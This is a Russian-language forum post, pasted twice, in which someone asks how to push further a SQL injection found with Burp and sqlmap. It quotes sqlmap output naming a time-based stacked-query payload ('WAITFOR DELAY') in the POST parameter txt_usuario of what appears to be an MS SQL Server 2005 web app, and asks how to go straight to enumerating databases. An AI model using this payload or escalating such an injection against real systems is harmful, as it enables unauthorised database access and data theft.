День добрый
Нашлась уязвимость через бурп, sqlmap выдал это, но без запрошенной enumerate т.е. не показал заголовков ни баз
Подскажите, пожалуйста, как докрутить эту уязвимость
sqlmap identified the following injection point(s) with a total of 1532 HTTP(s) requests:
---
Parameter: txt_usuario (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: txt_usuario=5679032';WAITFOR DELAY '0:0:2'--&op=validarIdentificacion
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web application technology: JSP, Servlet 3.0, JSP 2.2
back-end DBMS: Microsoft SQL Server 2005
Как правильно создать запрос для sqlmap с этими данными? Чтоб не проходил все заново а сразу переходил на уязвимый параметр
Нашлась уязвимость через бурп, sqlmap выдал это, но без запрошенной enumerate т.е. не показал заголовков ни баз
Подскажите, пожалуйста, как докрутить эту уязвимость
sqlmap identified the following injection point(s) with a total of 1532 HTTP(s) requests:
---
Parameter: txt_usuario (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: txt_usuario=5679032';WAITFOR DELAY '0:0:2'--&op=validarIdentificacion
Vector: ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
---
web application technology: JSP, Servlet 3.0, JSP 2.2
back-end DBMS: Microsoft SQL Server 2005
Как правильно создать запрос для sqlmap с этими данными? Чтоб не проходил все заново а сразу переходил на уязвимый параметр
